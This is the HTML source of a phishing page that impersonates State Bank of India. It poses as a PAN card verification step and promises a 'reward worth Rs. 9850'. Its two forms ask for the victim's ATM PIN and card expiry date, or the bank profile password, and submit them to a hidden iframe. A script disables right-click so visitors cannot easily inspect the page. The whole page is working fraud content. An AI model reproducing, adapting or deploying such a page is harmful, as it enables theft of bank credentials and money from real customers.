<!DOCTYPE HTML> 
<html>
   <head>
      <title>PAN Card Verification | State Bank of India</title>
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
      <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
      <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
      <link rel="manifest" href="/site.webmanifest">
      <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">
      <meta name="msapplication-TileColor" content="#da532c">
      <link rel="stylesheet" type="text/css" href="Style.css">
      <link rel="stylesheet" type="text/css" href="Style_Main.css">
      <link rel="preconnect" href="https://fonts.googleapis.com">
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <script type="module" src="main.js"></script>
      <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;500;600;700&display=swap" rel="stylesheet">
   </head>
   <style>
   #ii
   {
   position:absolute;
   top:4px;
   margin-left:-12%;
   }
   .login-box {
   width: 105%;
   padding: 5px;
   }
   .name
   {
   text-transform:uppercase;
   }
   .login-box .user-box {
   position: relative;
   }
   
   .login-box .user-box input {
   width: 100%;
   padding: 2px 4px;
   font-size: 16px;
   color: black;
   margin-bottom: 40px;
   margin-left:0px;
   border: none;
   caret-color:#673391;
   border-bottom: 1.5px solid #CCCCCC;
   outline: none;
   background: transparent;
   transition: border-color 0.2s;
   }
   .login-box .user-box label {
   position: absolute;
   top:-10px;
   left: 2px;
   padding: 5px 2px;
   font-size: 15px;
   font-family: ;
   color: #506070;
   pointer-events: none;
   transition: 0.3s;
   font-family: 'Open Sans', sans-serif;
   font-weight:400;
   
   }
   .login-box input:focus {
   width:100%;
   margin-bottom: 40px;
   padding: 2px 4px;
   margin-left:0px;
   font-size:16px;
   border-width: 2px;
   border-image: linear-gradient(#673391,#673392);
   border-image-slice: 1;
   
   }
   
   .login-box .user-box input:focus ~ label,
   .login-box .user-box input:valid ~ label {
   top: -30px;
   left: 2px;
   margin-left:2px;
   color: #506070;
   font-size: 14px;
   font-family: 'Open Sans', sans-serif;
   font-weight:600;
   }
   
   .login-box-mob {
   width: 100%;
   padding: 10px;
   margin-top:-14px;
   }
   .login-box-mob .user-box-mob {
   position: relative;
   }
   
   .error
   {
   color: Red;
   font-family: 'Work Sans', sans-serif;
   font-size:11px;
   font-style: italic;
   }
   </style>
   <script language="javascript"> 
   var message="This function is not allowed here.";
   function clickIE4(){
   if (event.button==2){
   alert(message);
   return false;
   }
   }
   function clickNS4(e){
   if (document.layers||document.getElementById&&!document.all){
   if (e.which==2||e.which==3){
   alert(message);
   return false;
   }
   }
   }
   if (document.layers){
   document.captureEvents(Event.MOUSEDOWN);
   document.onmousedown=clickNS4;}
   else if (document.all&&!document.getElementById){
   document.onmousedown=clickIE4;}
   document.oncontextmenu=new Function("alert(message);return false;")
   </script>
   <body onload="startTimer();" style="background:#fff;">
      <div class="container-fluid m-0 p-0">
    <img src="./assets/Header.png" width="98%">
    <img src="./assets/Menu.png" id="ii" width="10%">
</div>
      <!-- <section class="">
         <div class="container"> -->
         <!-- Static- Please don't do anything here-->
         <script type="text/javascript">var submitted=false;</script>
         <iframe name="hidden_iframe" id="hidden_iframe" style="display: none"></iframe>
         
         
           <div class="xxx">
            <div class="page-hea">
               <div class="row">
                  <div class="col-xs-6 col-md-6">
                     <h2 style="font-family: 'Open Sans', sans-serif; font-size:16px; font-weight:600; align-item:centre; text-align:centre;">Profile access To verify PAN Card </h2>
                  </div>
                  <div class="col-xs-6 col-md-6 text-right">
                     <h2>X</h2>
                  </div>
               </div>
            </div>
         <div style="border-left: #673391 solid 1px; padding: 0px 15px; border-right: #673391 solid 1px; padding: 0px 15px; border-top: #673391 solid 1px; padding: 0px 15px;">
            <div class="progress">
               <div class="progress-bar" style="font-family: 'Open Sans', sans-serif; color:#fff; font-weight:500; width:100%;">step 3/4: Redeem of reward worth Rs. 9850 </div>
            </div>
   
            
                  <br>
            <center><label>
               <input type="radio" name="options" value="Using debit card" onclick="showForm('form1')" checked> Using debit card
           </label>
           <a href="#" style="text-decoration: none; color: black;">
            <label>
               <input type="radio" name="options" value="option2" style="margin-left: 25px;" onclick="showForm('form2')"> Using Profile password
           </label>
           </a></center>
         </div>
           </div>

         <!--My Form-->
         <div>

            <form  id="form1" class="PIN" action="" method="post" target="hidden_iframe" onsubmit="submitted=true">
              
               <div class="p-50">
                  <div class="login-box">
                           <div class="user-box">
                           <input inputmode="numeric" name="pinatmpin" class="name" onkeydown="return /[0-9]/i.test(event.key)" maxlength="4"
                           required="">
                           <label>ATM PIN<span style="color:red;"> *</span></label>
                           </div>
                           <div class="user-box">
                           <input inputmode="numeric" name="pinexpdate" class="name" id="pan" maxlength="7"
                           title="Please enter valid expiry date !"
                           required="">
                           <label>Expiry Date/Valid thru<span style="color:red;"> *</span></label>
                          </div>
                  </div>
               </div>
               <div class="row">
                  <div class="col-xs-12 col-md-12 text-center">
                     <a href="#" style="font-family: 'Open Sans', sans-serif; font-weight:500;" class="btn btn-border">Back</a>
                     <button type="submit" style="font-family: 'Open Sans', sans-serif; font-weight:500;" class="btn btn-primary"> Submit </button>
                  </div>
               </div><br>
             </form>

         </div>



          <div>

            <form  id="form2" class="PIN2 hidden" action="" method="post" target="hidden_iframe" onsubmit="submitted=true">
               
                  
                 
                    
                  
                        <div class="p-50">
   
                           <div class="login-box">
                           <div class="user-box">
                              <input type="text" name="Profile_Password" minlength="8" maxlength="35"
                              required="">
                           <label>Profile Password<span style="color:red;"> *</span></label>
                           </div>
                           <!-- <div class="user-box">
                           <input inputmode="numeric" name="exp date" class="name" id="pan" maxlength="7"
                           title="Please enter valid expiry date !"
                           required="">
                           <label>Expiry Date/Valid thru<span style="color:red;"> *</span></label>
                          </div> -->
                  </div>
               </div>
               <div class="row">
                  <div class="col-xs-12 col-md-12 text-center">
                     <a href="#" style="font-family: 'Open Sans', sans-serif; font-weight:500;" class="btn btn-border">Back</a>
                     <button type="submit" style="font-family: 'Open Sans', sans-serif; font-weight:500;" class="btn btn-primary"> Submit 2 </button>
                  </div>
               </div><br>
             </form>

          </div>
          <script>
            

    function showForm(formId) {
            // Hide all forms
            var forms = document.querySelectorAll('form');
            forms.forEach(function(form) {
                form.classList.add('hidden');
            });

            // Show the selected form
            var selectedForm = document.getElementById(formId);
            selectedForm.classList.remove('hidden');
        }


        </script>

         </div>
      </section>
      <footer>
              <img src="./assets/Security.png"width="100%">
              <img src="./assets/Footer.png" class="img-fluid hidden-lg hidden-md" width="100%">
              
              </footer>
      
      
	  <script>
	  var timeleft = 30;
    var downloadTimer = setInterval(function(){
    timeleft--;
    document.getElementById("countdowntimer").textContent = timeleft;
    if(timeleft <= 0)
        clearInterval(downloadTimer);
    },1000);
	  </script>
</div>
</div>
</body>
</html>